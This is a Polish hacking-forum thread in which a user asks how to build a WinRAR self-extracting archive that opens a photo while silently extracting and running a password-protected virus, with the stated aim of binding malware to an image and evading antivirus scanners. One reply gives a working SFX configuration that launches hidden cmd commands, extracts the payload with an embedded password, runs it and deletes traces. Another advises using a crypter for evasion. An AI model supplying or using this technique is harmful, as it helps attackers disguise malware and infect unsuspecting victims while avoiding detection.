Winrar samorozpakowywujące się archiwum sfx z ukrytym hasłem

[Vanil]

Cześć wam, kiedyś widziałem poradnik, z którego sam korzystałem, który polegał na zrobieniu takiego archiwum sfx:

najpierw spakowałem wirusa w sfx + dodałem hasło 123 i nazwałem a.exe(nie pamiętam czy był dodawany komentarz tutaj, jeśli był to coś w stylu tego)

path=%temp%
SavePath
Setup=wirus.exe
Silent=1
Overwrite=1

no i był wirus, który był mniej wykrywalny przez skanery, bo uruchamiał się po wpisaniu hasła.

no ok, co dalej, potem z folderu głównego winrara, wyciągałem plik unrar.exe
zaznaczałem go, wraz z np. zdjecie.jpg oraz a.exe
zaznaczyłem opcję sfx, wybrałem nazwę, zmieniłem ikonę i teraz no właśnie, był tam kod w stylu tego:

path=%temp%
SavePath
Setup=zdjecie.jpg
Setup=a.exe
.................................................
Silent=1
Overwrite=1

Gdzie w miejscu kropek, był kod który był odpowiedzialny za automatyczne wpisanie hasła w tle, gdzie hasło było uzupełniane w tym właśnie kodzie. Pytanie do was, jaki to mógł być kod?

Efekt końcowy wyglądał tak, że po uruchomieniu tego końcowego pliku, uruchamiało się zdjęcie a w tle, uruchamiał się a.exe który automatycznie miał wpisywane hasło i otwierany wirus.exe który był w nim.

Chciałbym to zrobić dla skutecznego zbindowania wirusa ze zdjęciem oraz zmniejszeniem wykrywalności przez skanery, chyba że ktoś zna dobry darmowy binder który odniesie podobny rezultat, byłbym wdzięczny za podanie nazwy.

PS. W kodach mogłem się coś pomylić, żeby nikogo nie zmylić bo pisane wszystko z pamięci.
Liczę na waszą pomoc, ponieważ szukałem już po kilku forach, po google ale niestety nic. Dzięki !

 

[makankosapo]

Mam pytanie. Znalazłeś to kiedyś na jakiejś stronie czy jednak nie? Obecnie będę zajęty innymi sprawami. Zastanowię się nad tym, choć w przyszłym tygodniu to będę miał czas tylko w nocy.

 

[Xtremex]

Path=%systemroot%
Setup=plik.obojetnie
Setup=%systemroot%\system32\cmd.exe /c start /min %systemroot%\system32\cmd.exe /c "cd /d %systemroot%&unrar.exe e -o- -phaslo serwer.rar&start backup.exe&del unrar.exe backup.rar
Silent=1
Overwrite=2


Gdzie haslo to nasze hasło

 

[partur]

Witam to mój pierwszy post na tej stronie i jeśli chodzi o samą tematykę forum to jestem Newbie. Umiem jednak zrobić coś takiego .. ehh nie wiem jak to wytłumaczyć może pokaże ^na>tym<przykładzie^.

był tam kod w stylu tego:

path=%temp%
SavePath
Setup=zdjecie.jpg
Setup=a.exe
.................................................
Silent=1
Overwrite=1

Tylko tyle kodu zapamiętałeś? Dobrze że nikt nie wymaga wykucia materiału zawartego w tym Manualu który firma Intel udostępniła. WinRar używa mniejszej liczby przełączników i opcji ale też są one spisane i dostęp do nich jest wydaje mi się dość prosty..


PS. w sumie to nawet fajna opcja nigdy się nad tym nie zastanawiałem ale przynajmniej można pocztą przesyłać pliki bez konieczności partowania itp.
Pozdrawiam

 

[meViu]

Chciałbym to zrobić dla skutecznego zbindowania wirusa ze zdjęciem oraz zmniejszeniem wykrywalności przez skanery, chyba że ktoś zna dobry darmowy binder który odniesie podobny rezultat, byłbym wdzięczny za podanie nazwy.

Niestety zmartwię Cię, ale takie archiwum SFX owszem czasami zmniejsza wykrywalność ale tylko scantime. Po uruchomieniu archiwum i wypakowaniu, a następnie uruchomieniu zbindowanych plików antywirus i tak je wykryje. Jeśli chcesz zmniejszyć wykrywalność potrzebujesz crypter'a.